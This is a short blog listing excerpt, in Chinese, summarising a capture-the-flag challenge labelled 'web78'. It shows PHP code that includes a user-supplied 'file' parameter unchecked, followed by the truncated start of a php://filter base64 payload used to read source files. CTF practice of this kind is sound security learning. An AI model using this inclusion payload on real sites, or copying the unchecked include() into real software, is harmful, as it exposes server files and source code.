摘要: web78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } payload: ?file=php://filter/convert.base64-e 阅读全文
posted @ 2022-08-12 15:33 Freshman0611 阅读(142) 评论(0) 推荐(0)